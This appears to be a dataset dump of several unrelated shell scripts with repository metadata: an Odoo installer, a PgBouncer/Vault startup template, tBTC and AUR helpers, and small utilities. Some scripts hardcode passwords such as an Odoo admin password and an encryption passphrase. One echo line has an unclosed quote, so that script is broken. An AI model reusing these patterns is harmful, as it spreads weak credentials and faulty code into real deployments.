blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
7e14d6d8293daea7531f9ae91a55cec4e37027c2
|
Shell
|
luissilv4/SO
|
/p3.sh
|
UTF-8
| 246
| 3.359375
| 3
|
[] |
no_license
|
#!/bin/bash
#Troca a extensao de um ficheiro
read -p "Introduza a extensão a alterar: " extensao
read -p "Introduza a extensão que pretende: " extensao1
for ficheiro in *.$extensao
do
mv "$ficheiro" "${ficheiro%.$extensao}.$extensao1"
done
| true
|
9481238f443e40c99fc1a2454ea00ad6e2cfab7f
|
Shell
|
andrevinsky/testid-support
|
/ensure-variables-and-paths.sh
|
UTF-8
| 928
| 2.96875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -e
if [[ -z "$JEST_JUNIT_OUTPUT_DIR_PARENT" ]]; then
export JEST_JUNIT_OUTPUT_DIR_PARENT=$(pwd)/reports
fi
echo "JEST_JUNIT_OUTPUT_DIR_PARENT=$JEST_JUNIT_OUTPUT_DIR_PARENT"
rm -rf "$JEST_JUNIT_OUTPUT_DIR_PARENT"
mkdir -p "$JEST_JUNIT_OUTPUT_DIR_PARENT"
if [[ -z "$JEST_JUNIT_OUTPUT_DIR" ]]; then
export JEST_JUNIT_OUTPUT_DIR=$JEST_JUNIT_OUTPUT_DIR_PARENT/junit
mkdir -p "$JEST_JUNIT_OUTPUT_DIR"
fi
if [[ -z "$JEST_COVERAGE_OUTPUT_DIR" ]]; then
export JEST_COVERAGE_OUTPUT_DIR=$JEST_JUNIT_OUTPUT_DIR_PARENT/coverage
mkdir -p "$JEST_COVERAGE_OUTPUT_DIR"
fi
echo "JEST_JUNIT_OUTPUT_DIR=$JEST_JUNIT_OUTPUT_DIR"
echo "JEST_COVERAGE_OUTPUT_DIR=$JEST_COVERAGE_OUTPUT_DIR"
if [[ -z "$CI_ARTIFACTS_PATH" ]]; then
export CI_ARTIFACTS_PATH=$(pwd)/ci-artifacts
mkdir -p "$CI_ARTIFACTS_PATH"
fi
echo "CI_ARTIFACTS_PATH=$CI_ARTIFACTS_PATH"
mkdir -p "$CI_ARTIFACTS_PATH/npm-logs"
| true
|
bc901493980bd64ed4493ac7fc9db1388f9c34f9
|
Shell
|
amine784/holberton-system_engineering-devops
|
/0x04-loops_conditions_and_parsing/4-if_9_say_hi
|
UTF-8
| 198
| 3.0625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#a Bash script that displays Holberton School 10 times using until
c=0
while (( c < 10 ))
do
if ((c ==9))
then
echo "Hi"
fi
echo "Holberton School"
((c++))
done
| true
|
f7d51173628c2598c8dd34bfcdaf16f7329aea48
|
Shell
|
NguyenAzai/data1
|
/install-odoo11-on-ubuntu-bash.sh
|
UTF-8
| 1,897
| 2.671875
| 3
|
[] |
no_license
|
sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt install git python3-pip build-essential wget python3-dev python3-venv python3-wheel libxslt-dev libzip-dev libldap2-dev libsasl2-dev python3-setuptools node-less -y
sudo useradd -m -d /opt/odoo11 -U -r -s /bin/bash odoo11
sudo apt-get install node-clean-css -y
sudo apt-get install node-less -y
sudo apt-get install python-gevent -y
sudo apt install postgresql -y
sudo service postgresql start
sudo su - postgres -c "createuser -s odoo11"
sudo su - postgres -c "psql -c 'create role odoo11 with login superuser;'"
wget https://github.com/wkhtmltopdf/wkhtmltopdf/releases/download/0.12.5/wkhtmltox_0.12.5-1.bionic_amd64.deb
sudo apt install ./wkhtmltox_0.12.5-1.bionic_amd64.deb -y
sudo su - odoo11 -c "git clone https://www.github.com/odoo/odoo --depth 1 --branch 11.0 /opt/odoo11/odoo"
sudo su - odoo11 -c "cd /opt/odoo11 && python3 -m venv odoo-venv && source odoo-venv/bin/activate && pip3 install wheel && pip3 install -r odoo/requirements.txt && deactivate"
sudo su - odoo11 -c "mkdir /opt/odoo11/odoo-custom-addons"
sudo touch /etc/odoo11.conf
sudo su root -c "printf '[options] \n; This is the password that allows database operations:\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'admin_passwd = my_admin_passwd\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'xmlrpc_port = 9069\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'db_host = False\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'db_port = False\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'db_user = odoo11\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'db_password = False\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'addons_path = /opt/odoo11/odoo/addons,/opt/odoo11/odoo-custom-addons\n' >> /etc/odoo11.conf"
sudo chown odoo11:odoo11 /etc/odoo11.conf
sudo chmod 640 /etc/odoo11.conf
echo "Installation Done"
| true
|
79534256f8045a678ce6e26cb54503723cc6c872
|
Shell
|
andy2046/bitmap
|
/scripts/help.sh
|
UTF-8
| 173
| 2.734375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
set -euo pipefail
echo 'usage: make [target] ...'
echo
echo 'targets:'
fgrep -h "##" ./Makefile | fgrep -v fgrep | sed -e 's/\\$$//' | sed -e 's/##//'
| true
|
1254483967f088752b8e682b4b7ccdfa79720742
|
Shell
|
wordswords/dotfiles
|
/bin/search-ebooks.sh
|
UTF-8
| 242
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
BOOKPATHROOT=/mnt/ebooks
PARAMS="*$**.epub"
EPY_PATH="/home/david/.local/bin/epy"
cd "${BOOKPATHROOT}"
bookpath=$(find . -type f -iname "${PARAMS}" 2>/dev/null | sort -r | fzf --disabled)
"${EPY_PATH}" "${bookpath}"
cd -
| true
|
248417c80bdeceec8a87422792d11acdc7bc58af
|
Shell
|
amazon-biobank/biobank
|
/blockchain/test-network/createUserAccount.sh
|
UTF-8
| 490
| 2.578125
| 3
|
[] |
no_license
|
cd ./../currency-contract
node_modules/.bin/mocha functionalTests/AccountContract-biobank.test.js --grep="createUserAccount"
WALLET_PATH=$(cat config.json | jq '.walletPath' | tr -d \")
IDENTITY_NAME=$(cat config.json | jq '.identityName' | tr -d \" )
cd -
GREEN='\033[0;32m'
NC='\033[0m'
cd ../../application/encryptCertificate/src/
node encryptCredentials.js ~/$WALLET_PATH "${IDENTITY_NAME}.id" amazonbiobank
mv e-admin.id ./../../../
echo -e "${GREEN} generated e-admin.id ${NC}
cd -
| true
|
061279d50a757bb3125bce559e629fca2900e58b
|
Shell
|
mindvalley/tf-module-pgbouncer-mig
|
/scripts/startup.sh.tpl
|
UTF-8
| 6,329
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# This script is meant to be run as the Startup Script of a Compute Instance
# while it's booting. Afterwards it performs the necessary api requests to login
# to a Vault cluster. At the end it also serves a simple webserver with a message
# read from Vault, for test purposes, so we can curl the response and test that
# the authentication example is working as expected.
set -e
# Send the log output from this script to startup-script.log, syslog, and the console
# Inspired by https://alestic.com/2010/12/ec2-user-data-output/
exec > >(tee /var/log/startup-script.log|logger -t startup-script -s 2>/dev/console) 2>&1
function log {
local -r message="$1"
local readonly timestamp=$(date +"%Y-%m-%d %H:%M:%S")
>&2 echo -e "$timestamp $message"
}
# A retry function that attempts to run a command a number of times and returns the output
function retry {
local -r cmd="$1"
local -r description="$2"
for i in $(seq 1 30); do
log "$description"
# The boolean operations with the exit status are there to temporarily circumvent the "set -e" at the
# beginning of this script which exits the script immediatelly for error status while not losing the exit status code
output=$(eval "$cmd") && exit_status=0 || exit_status=$?
log "$output"
if [[ $exit_status -eq 0 ]]; then
echo "$output"
return
fi
log "$description failed. Will sleep for 10 seconds and try again."
sleep 10
done;
log "$description failed after 30 attempts."
exit $exit_status
}
# ==========================================================
# BEGIN TO CONFIGURE THE INSTANCE
# ==========================================================
# Ensure the vault agent is configured with proper contents & templates
mkdir -p /etc/vault
cat <<EOF > /etc/vault/pgbouncer-userlist.ctmpl
"statsuser" = "somereallyfakestringthatdoesnothaveanymeaningatall"
%{ for db in enabled_databases }
{{ with secret "${db.password_vault_secret_path}" }}
"${db.username}" = "{{ .Data.postgres_db_password }}"
{{ end }}
%{ endfor ~}
EOF
# Create needed PgBouncer configuration files
cat <<EOF > /etc/pgbouncer/pgbouncer.ini
[databases]
%{ for db in enabled_databases }
${db.name} = host=${db.host} port=${db.port} dbname=${db.name} pool_size=${db.pool_size} user=${db.username}
%{ endfor ~}
[pgbouncer]
listen_port=${pgbouncer_config.listen_port}
listen_addr=${pgbouncer_config.listen_addr}
max_client_conn=${pgbouncer_config.max_client_conn}
unix_socket_dir=/tmp
auth_file=/etc/pgbouncer/userlist.txt
auth_hba_file=/etc/pgbouncer/pg_hba.conf
auth_type=hba
stats_users=statsuser
pool_mode=transaction
client_tls_sslmode=disable
ignore_startup_parameters = extra_float_digits
stats_period=10
syslog=1
EOF
cat <<EOF > /etc/pgbouncer/pg_hba.conf
# Allow any user on the local system to connect to any database with
# any database user name using Unix-domain sockets (the default for local
# connections).
#
# TYPE DATABASE USER ADDRESS METHOD
local all statsuser trust
host all all 0.0.0.0/0 md5
EOF
# Create Vault agent config
cat <<EOF > /etc/vault/config.hcl
pid_file = "/tmp/vault.pid"
vault {
address = "${vault_config.vault_server_address}"
tls_skip_verify = "${vault_config.tls_skip_verify}"
retry {
num_retries = 5
}
}
auto_auth {
method "gcp" {
config = {
type = "gce"
role = "${vault_config.vault_cluster_role}"
}
}
}
template {
source = "/etc/vault/pgbouncer-userlist.ctmpl"
destination = "/etc/pgbouncer/userlist.txt"
}
EOF
# Ensure the supervisord's program are presented
## PgBouncer
cat <<EOF > /etc/supervisor/conf.d/10-pgbouncer.conf
[program:pgbouncer]
command=/usr/sbin/pgbouncer /etc/pgbouncer/pgbouncer.ini
process_name=%(program_name)s
numprocs=1
directory=/tmp
umask=022
priority=10
autostart=true
autorestart=unexpected
startsecs=10
startretries=3
exitcodes=0
stopsignal=TERM
stopwaitsecs=10
stopasgroup=false
killasgroup=false
user=postgres
serverurl=AUTO
stdout_syslog=true
stderr_syslog=true
EOF
## PgBouncer Exporter
cat <<EOF > /etc/supervisor/conf.d/11-pgbouncer-exporter.conf
[program:pgbouncer-exporter]
command=/usr/local/bin/pgbouncer_exporter --pgBouncer.connectionString="postgresql:///pgbouncer?host=/tmp&port=6432&sslmode=disable&user=statsuser"
process_name=%(program_name)s
numprocs=1
directory=/tmp
umask=022
priority=11
autostart=true
autorestart=unexpected
startsecs=10
startretries=5
exitcodes=0
stopsignal=TERM
stopwaitsecs=10
stopasgroup=false
killasgroup=false
user=postgres
serverurl=AUTO
stdout_syslog=true
stderr_syslog=true
EOF
## PgBouncer Healthcheck
cat <<EOF > /etc/supervisor/conf.d/12-pgbouncer-health-check.conf
[program:pgbouncer-healthcheck]
command=/usr/local/bin/pgbouncer-healthcheck
process_name=%(program_name)s
numprocs=1
directory=/tmp
umask=022
priority=12
autostart=true
autorestart=unexpected
startsecs=10
startretries=5
exitcodes=0
stopsignal=TERM
stopwaitsecs=10
stopasgroup=false
killasgroup=false
user=postgres
serverurl=AUTO
stdout_syslog=true
stderr_syslog=true
environment=CONNSTR="host=/tmp port=6432 user=statsuser dbname=pgbouncer sslmode=disable",ENHANCED_CHECK="true"
EOF
## Node-Exporter
cat <<EOF > /etc/supervisor/conf.d/13-node-exporter.conf
[program:node-exporter]
command=/usr/local/bin/node_exporter
process_name=%(program_name)s
numprocs=1
directory=/tmp
umask=022
priority=13
autostart=true
autorestart=unexpected
startsecs=10
startretries=5
exitcodes=0
stopsignal=TERM
stopwaitsecs=10
stopasgroup=false
killasgroup=false
user=nobody
serverurl=AUTO
stdout_syslog=true
stderr_syslog=true
EOF
## Vautl Agent
cat << EOF > /etc/supervisor/conf.d/14-vault.conf
[program:vault-agent]
command=/usr/local/bin/vault agent -config=/etc/vault/config.hcl
process_name=%(program_name)s
numprocs=1
directory=/tmp
umask=022
priority=1
autostart=true
autorestart=unexpected
startsecs=10
startretries=5
exitcodes=0
stopsignal=TERM
stopwaitsecs=10
stopasgroup=false
killasgroup=false
user=root
serverurl=AUTO
stdout_syslog=true
stderr_syslog=true
EOF
# Restart services
retry "systemctl stop pgbouncer" "Stop Pgbouncer"
retry "systemctl disable pgbouncer" "Disable Pgbouncer from systemd"
retry "systemctl restart supervisor" "Restart Supervisor"
| true
|
950fb2237ddf25c5951527b45772ff68a9b3589a
|
Shell
|
amyq7526110/ebook
|
/chapter9/E_9_6_2.sh
|
UTF-8
| 430
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/bash
# cat "$@" -
# 使用 ./scriptname 1 2 3 4 5 调用这个脚本
echo "$@" # 1 2 3 4 5
shift
echo "$@" # 2 3 4 5
shift
echo "$@" # 3 4 5
# 每个shift 都会丢弃$1
# "$@" 将包含剩下的参数
# $@也作为为工具使用,用来过滤传给脚本的输入.
# cat "$@"结构接受从 stdin 传来的输入,也接受从参数中指定的文件传来的输入.
| true
|
4f90fec5f23bf5778ed932698ec901b47f604683
|
Shell
|
k0kk0k/keep-tBTC-minter
|
/run.sh
|
UTF-8
| 861
| 3.109375
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/bash
# `run.sh` can help you start multiple processes at the same time, you can use crontab
# */10 * * * * cd ~/keep-tbtc-minter && /usr/bin/nohup /bin/bash run.sh sendBtc 1 >> log_run.log 2>&1 &
# */3 * * * * cd ~/keep-tbtc-minter && /usr/bin/nohup /bin/bash run.sh deposit 10 >> log_run.log 2>&1 &
# */3 * * * * cd ~/keep-tbtc-minter && /usr/bin/nohup /bin/bash run.sh resume 10 >> log_run.log 2>&1 &
node_exp="/home/ubuntu/.nvm/versions/node/v12.18.2/bin/node --experimental-json-modules --experimental-modules"
action=$1
threadNum=$2
echo "================$(date) Action $action with $threadNum thread"
ps -ef | grep "index.js ${action}" | grep -v grep | awk '{print $2}' | xargs kill -9
for ((i=0; i<$threadNum; ++i)); do
echo "$(date) ===Start $action #$i===="
/usr/bin/nohup $node_exp index.js $action >> log_$action.log 2>&1 &
done
| true
|
6a431ba60224f649906d9e61093ca2b4ab8f809e
|
Shell
|
mitchpaulus/dotfiles
|
/scripts/group_count
|
UTF-8
| 223
| 3.21875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Check that first argument is an integer, greater than 0
if [ $# -ne 1 ] || [ "$1" -lt 1 ] 2>/dev/null; then
echo "Usage: $0 <field number>"
exit 1
fi
awk -F ' ' '{print $'"$1"'}' | mpuniq -c | sort -V
| true
|
345eea2cfc0995ec9b21d992b548558dd41d7e1b
|
Shell
|
jmckaskill/tup
|
/test/t5044-ghost-dir-to-file.sh
|
UTF-8
| 494
| 3.09375
| 3
|
[] |
no_license
|
#! /bin/sh -e
# Make sure changing a ghost dir to a real file works. Basically the same as
# t5044, only we're checking to see that a file can still have ghost children.
. ./tup.sh
cat > Tupfile << HERE
: |> (cat secret/ghost || echo nofile) > %o |> output.txt
HERE
tup touch Tupfile
update
echo nofile | diff - output.txt
touch secret
tup touch secret
update
rm secret
tup rm secret
tmkdir secret
echo boo > secret/ghost
tup touch secret/ghost
update
echo boo | diff - output.txt
eotup
| true
|
2d00a7176859f11a8289c54554859389b8f49f60
|
Shell
|
bdashrad/nagios-plugins
|
/check_f5_status
|
UTF-8
| 1,288
| 3.921875
| 4
|
[] |
no_license
|
#!/bin/bash
# Checks if BIG-IP LTM is Active or Failover
# Configuration
snmpget="/usr/bin/snmpget"
community=""
snmpversion=2c
# nagios return values
export STATE_OK=0
export STATE_WARNING=1
export STATE_CRITICAL=2
export STATE_UNKNOWN=3
export STATE_DEPENDENT=4
if [ $# -lt 1 ]; then
echo "Usage: $0 -H host -C community -S (active|standby)"
exit
fi
while getopts ":H:C:S:" opt; do
case $opt in
H) host=$OPTARG ;;
C) community=$OPTARG ;;
S) expected=$OPTARG ;;
\?)
echo "Invalid option: -$OPTARG" >&2
echo "Usage: $0 -H host -C community [-w warning] [-c critical]"
exit
;;
:)
echo "Option -$OPTARG requires an argument" >&2
exit
;;
esac
done
oid=1.3.6.1.4.1.3375.2.1.1.1.1.19.0
case $expected in
active)
expectedStatus=3
;;
standby)
expectedStatus=0
;;
*)
echo "Expected Status must be 'active' or 'standby'"
exit
;;
esac
STATUS=`snmpget -Ov -v 2c -c $community $host $oid | awk '{print $2}'`
case $STATUS in
0)
status="standby"
;;
1)
status="active-1"
;;
2)
status="active-2"
;;
3)
status="active"
;;
esac
if [ "$STATUS" -ne "$expectedStatus" ]; then
returnValue=$STATE_WARNING ;
fi
outMessage="Current State: ${status} - Expected: ${expected} | 'Status'=$STATUS"
echo -e $outMessage
exit $returnValue
| true
|
b53f4d10784d882010a2ed4475ef1822db9de859
|
Shell
|
SunnyQjm/NDNInstaller
|
/install_ndnrtc.sh
|
UTF-8
| 2,450
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
# 通用的函数定义和变量定义
source ./common.sh
NDN_CPP_VERSION=v0.16
NDNRTC_VERSION=v3.0.2
# install pre
echo 'install pre'
sudo apt-get install cmake wget autoconf automake libtool git protobuf-compiler libconfig++-dev libconfig++9v5
cd ${DEFAULT_DIR}
mkdir ndnrtc-env
cd ndnrtc-env
export NDNRTC_ENV=`pwd`
# depot_tools.git
cd $NDNRTC_ENV
echo 'begin install depot_tools to: '`pwd`
git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
export PATH=$PATH:`pwd`/depot_tools
echo 'install depot_tools finished'
# webrtc
cd $NDNRTC_ENV
echo 'begin install webrtc'
mkdir webrtc-checkout
cd webrtc-checkout/
echo 'begin fetch webrtc: '`pwd`
fetch --nohooks webrtc
cd src
git checkout -b branch-heads-59 refs/remotes/branch-heads/59
echo 'do gclient in: '`pwd`
gclient sync
./build/install-build-deps.sh
gn gen out/Default --args='is_debug=false'
ninja -C out/Default
# ndn-cpp
cd $NDNRTC_ENV
echo 'begin install ndn-cpp:'`pwd`
OLD_DEFAULT_DIR=${DEFAULT_DIR}
DEFAULT_DIR=${NDNRTC_ENV}
sudo apt install build-essential libssl-dev libsqlite3-dev libprotobuf-dev protobuf-compiler \
liblog4cxx-dev doxygen -y
cloneOrUpdate ndn-cpp https://github.com/named-data/ndn-cpp/archive/${NDN_CPP_VERSION}.tar.gz ndn-cpp
mkdir -p build/share
./configure --with-std-shared-ptr=no --with-std-function=no --prefix=$(pwd)/build
make
sudo make install
DEFAULT_DIR=${OLD_DEFAULT_DIR}
echo 'install ndn-cpp finished! => '`pwd`
# install OpenFEC
cd $NDNRTC_ENV
wget http://openfec.org/files/openfec_v1_4_2.tgz
tar -xvf openfec_v1_4_2.tgz && rm openfec_v1_4_2.tgz
mkdir -p openfec_v1.4.2/build && cd openfec_v1.4.2/
wget https://raw.githubusercontent.com/remap/ndnrtc/master/cpp/resources/ndnrtc-openfec.patch && patch src/CMakeLists.txt ndnrtc-openfec.patch
cd build/
cmake .. -DDEBUG:STRING=OFF
make
# install ndnrtc
DEFAULT_DIR=${NDNRTC_ENV}
cloneOrUpdate ndnrtc https://github.com/remap/ndnrtc/archive/${NDNRTC_VERSION}.tar.gz ndnrtc
cd cpp
mkdir -p build/share
echo 'CPPFLAGS="-g -O2 -DWEBRTC_POSIX" CXXFLAGS="-g -O2 -DWEBRTC_POSIX"' > build/share/config.site
echo NDNCPPDIR=`pwd`/../../ndn-cpp/build/include >> build/share/config.site
echo NDNCPPLIB=`pwd`/../../ndn-cpp/build/lib >> build/share/config.site
echo OPENFECDIR=`pwd`/../../openfec_v1.4.2 >> build/share/config.site
echo WEBRTCDIR=`pwd`/../../webrtc-checkout/src >> build/share/config.site
./configure --prefix=$(pwd)/build
make && make install
| true
|
b026674f6a5d520f38b964c20cedcf184445ec8e
|
Shell
|
unixorn/tumult.plugin.zsh
|
/bin/markdown-open
|
UTF-8
| 937
| 3.78125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
# https://github.com/rtomayko/dotfiles/blob/rtomayko/bin/markdown-open
if [[ "$(uname -s)" != 'Darwin' ]]; then
echo 'Sorry, this script only works on macOS'
exit 1
fi
function debug() {
echo "$@" 1>&2
}
f=$1
if [ -z "$f" ] || [ "$f" = "-" ] ; then
f=/tmp/markdown-$$.txt
cat > $f
trap 'rm -f $f' 0
fi
bn=$(basename $f | sed 's:^\(.*\)\.txt$:\1:')
html_file="$(dirname $f)/$bn.html"
cat <<EOF > "$html_file"
<html>
<head>
<title>$f</title>
<link href="https://github.com/assets/github.css" media="screen" rel="stylesheet" type="text/css" />
<style type="text/css">
div#container {
max-width: 852px;
margin: 50px auto;
}
</style>
<body>
<div id="container" class="markdown-body">
EOF
sundown < "$f" >> "$html_file"
cat <<EOF >> "$html_file"
</div>
</body>
</html>
EOF
rslt=$?
[ $rslt != 0 ] && exit $rslt
open "$html_file"
sleep 0.5
unlink "$html_file"
| true
|
d78d35d786868dd935ce05c6309d77df55ed7a1b
|
Shell
|
patrickfarias/ritchie-formulas
|
/kubernetes/clean/helm-configmap/src/helm-configmap/helm-configmap.sh
|
UTF-8
| 390
| 3.109375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
run() {
CONFIGMAP_LIST=$(kubectl -n kube-system get configmap |awk '{print $1}'|cut -f1 -d.|sort|uniq|grep -v 'NAME');
for i in $CONFIGMAP_LIST;
do echo "$i";
for j in $(kubectl -n kube-system get configmap | grep "$i" | awk '{print $1}'|cut -d. -f2|cut -dv -f2| sort -n | head -n -2); do echo "$i".v"$j"; kubectl -n kube-system delete configmap "$i".v"$j" ; done; done
}
| true
|
60a9a3419db5c5c9cb9ed5a593a5735ed609c864
|
Shell
|
JakeGuy11/dotfiles
|
/install-programs.sh
|
UTF-8
| 985
| 2.8125
| 3
|
[] |
no_license
|
#!/usr/bin/bash
# This will install all my other programs
read -p "Once you have ensured multilib is enabled in '/etc/pacman.conf' and press enter"
ARCH_PACKAGES=""
# Just so I can keep track of what packages are what, I'll add them incrementally here
# Basic programming packages and libraries
ARCH_PACKAGES+="gcc
python
python-pip
wget
curl
jdk-openjdk
jre-openjdk
jre-openjdk-headless
nodejs
npm
"
# Fonts, languages, etc.
ARCH_PACKAGES+="fcitx-im
fcitx-mozc
fcitx-configtool
adobe-source-han-sans-jp-fonts
adobe-source-han-sans-kr-fonts
ttf-liberation
wqy-zenhei
noto-fonts-emoji
"
# Audio/Visual
ARCH_PACKAGES+="ffmpeg
youtube-dl
blender
gimp
inkscape
mkvtoolnix-cli
audacity
vlc
cmus
xf86-video-intel
mesa
lib32-mesa
pavucontrol
redshift
scrot
"
# Archives/File stuff
ARCH_PACKAGES+="ark
p7zip
tree
unzip
zip
"
# Internet/browser stuff
ARCH_PACKAGES+="discord
qbittorrent
steam
tor
torbrowser-launcher
vivaldi"
echo "$ARCH_PACKAGES"
doas -- pacman -Syu $ARCH_PACKAGES
| true
|
1d3b7ca3dbdc6abb1444ea15f20f1d33bcc6f269
|
Shell
|
iceFeeder/sscriptss
|
/backup/contrail-hamon
|
UTF-8
| 697
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
# chkconfig: 2345 99 01
# description: contrail-hamon service
. /etc/rc.d/init.d/functions
case "$1" in
start)
# contral-hamon startup
echo -n "Starting contral-hamon: "
exec start contrail-hamon
echo "OK"
;;
stop)
# contral-hamon shutdown
echo -n "Shutdown contral-hamon: "
exec stop contrail-hamon
echo "OK"
;;
reload|restart)
$0 stop
$0 start
;;
status)
exec status contrail-hamon
#status -p $pid_file cassandra
exit $?
;;
*)
echo "Usage: `basename $0` start|stop|status|restart|reload"
exit 1
esac
exit 0
| true
|
e3d7f7698366c314de7410c8bc7b42eabdb71041
|
Shell
|
hitswint/.emacs.d
|
/dotfiles/bin/external-edit
|
UTF-8
| 1,853
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
while getopts "se:" arg #选项后面的冒号表示该选项需要参数
do
case $arg in
s)
sel=1
;;
e)
editor=$OPTARG #参数存在$OPTARG中
;;
?) #当有不认识的选项的时候arg为?
echo "Usage: external-edit [-s] [-e editor]"
echo "-s select"
echo "-e editor"
exit 1
;;
esac
done
xte_selectall()
{
case $xwin_title in
*emacs@* | *Microsoft\ Word* )
xte <<EOF
sleep 1
keydown Control_L
key x
keyup Control_L
key h
EOF
;;
*)
xte <<EOF
sleep 1
keydown Control_L
key a
keyup Control_L
EOF
;;
esac
}
xwin_id=`xdpyinfo | sed -ne 's/^focus:.*\(0x[^,]\+\).*/\1/p'`
if xwininfo -id $xwin_id | grep "(has no name)"
then
xwin_id=`printf "0x%x\n" $(( $xwin_id - 1 ))` #Decrement by one.
fi
xwin_title=`xwininfo -id $xwin_id | sed -ne 's/xwininfo: .*"\([^"]\+\)"/\1/p'`
if [ $sel ]; then
xte_selectall
fi
Wind_id=`xdotool getactivewindow`;
sleep 0.5
if [ $(xdotool search --onlyvisible --class "URxvt" | grep -i $Wind_id) ]; then
word=$(xclip -selection primary -o | sed 's/[\"]/\\&/g')
else
xdotool keyup ctrl+c
xdotool key --clearmodifiers ctrl+c
word=$(xclip -selection clipboard -o | sed 's/[\"]/\\&/g')
fi
# run-or-raise.sh emacs
ELISP=$( cat $HOME/bin/emacs_anywhere.el )
$editor -a '' -c -F "((name . \"ec_float\")(top . -1))" -e "(progn $ELISP (insert \"$word\"))"
. /tmp/eaenv
if [ "$EA_ABORT" = true ]; then
exit 0;
fi
wmctrl -ia $xwin_id
Emacs_style='^.*(emacs@|Microsoft Word).*$'
if [[ $xwin_title =~ $Emacs_style ]]; then
xdotool keyup ctrl+y
xdotool key --clearmodifiers ctrl+y
else
xdotool keyup ctrl+v
xdotool key --clearmodifiers ctrl+v
fi
| true
|
eec1b818a481fa0aa4fcda663d7a45ed0301930e
|
Shell
|
gitter-badger/aur4migrate
|
/aur4_import.sh
|
UTF-8
| 1,117
| 3.859375
| 4
|
[] |
no_license
|
#!/bin/sh
if [ $# -lt 1 -o \( "$1" = "-h" -o "$1" = "--help" \) ]; then
echo "usage: $0 <path/to/package>"
echo "(has to be started from root of the existing repository)"
exit -1
fi
prefix=$1
pkg=`basename $prefix`
gitignore=`pwd`/gitignore-pkg
# create a new repository only for $pkg in the branch aur4/$pkg
echo git subtree split --prefix=\"$prefix\" -b aur4/$pkg
git subtree split --prefix="$prefix" -b aur4/$pkg || exit -1
# add/update .gitignore and .SRCINFO for every commit in the new branch
echo git filter-branch -f --tree-filter \
\"cp $gitignore .gitignore\; mksrcinfo\" -- aur4/$pkg
git filter-branch -f --tree-filter "cp $gitignore .gitignore; mksrcinfo" \
-- aur4/$pkg || exit -1
#ssh aur@aur4.archlinux.org setup-repo $pkg
# push the new branch to the repo on AUR 4
echo git push ssh+git://aur@aur4.archlinux.org/${pkg}.git/ aur4/$pkg:master
git push ssh+git://aur@aur4.archlinux.org/${pkg}.git/ aur4/$pkg:master \
|| exit -1
# delete the temporary branch
# the AUR 4 repository can be added as a submodule, see aur4_make_submodule.sh
echo git branch -D aur4/$pkg
git branch -D aur4/$pkg
| true
|
3b637a8b8877bb62d93a52983a0dea0f1d9390a3
|
Shell
|
JessedeDoes/LMServer
|
/scripts/newTestsParagraphDecoder.sh
|
UTF-8
| 5,578
| 2.734375
| 3
|
[] |
no_license
|
BFB=/datalokaal/Scratch/HTR/BFBNew
UNI=$BFB/LanguageModels/Unigram/
LM1=$UNI/languageModel.lm
DIC1=$UNI/dictionary.txt
LAT1=$BFB/StoredExperiments/experimentWithUnigramModel/resultados/res-128gauss/
TEMP1=Temp/Temp1
DIR2=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/2-gram/FinalInDomainBentham/OneLineINBentham/
DIC2=$DIR2/dictionary.txt
LM2=$DIR2/languageModel.lm
LAT2=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/2-gram/FinalInDomainBentham/OneLineINBentham/resultados/res-128gauss/
TEMP2=Temp/Temp2
LAT2a=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/CoTrainingSingelIterationNewCharacterSet/OneLineECCO/intOneLine/resultados/res-128gauss/
DIR2a=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/CoTrainingSingelIterationNewCharacterSet/OneLineECCO/intOneLine/
LM2a=$DIR2a/interpolatedLM.lm
DIC2a=$DIR2a/dictionary.txt
TEMP2a=Temp/Temp2a
DIR3=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/3-gram-oneline
LM3=$DIR3/int/interpolatedLM.lm
DIC3=$DIC2a
LAT3=$LAT2a
TEMP3=Temp/Temp3
DIR4=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/4-gram-oneline
LM4=$DIR4/int/interpolatedLM.lm
DIC4=$DIC2a
LAT4=$LAT2a
TEMP4=Temp/Temp4
DIR5=/mnt/Projecten/transcriptorium/Tools/languagemodeling/NewSetOfExperiment/5-gram-oneline
LM5=$DIR5/int/interpolatedLM.lm
DIC5=$DIC2a
LAT5=$LAT2a
TEMP5=Temp/Temp5
test()
{
LM1=$1
DIC1=$2
LAT1=$3
TEMP=$4
echo "testing $LM1 $DIC1 $LAT1"
java -cp ./bin/ eu.transcriptorium.lattice.LatticeListDecoder $LM1 $DIC1 $LAT1 > $TEMP/listDecoder.1.out 2>$TEMP/decoder.log
perl scripts/makeResultsFileFrom1BestResult.pl $TEMP/listDecoder.1.out > $TEMP/listDecoder.result.1.cs
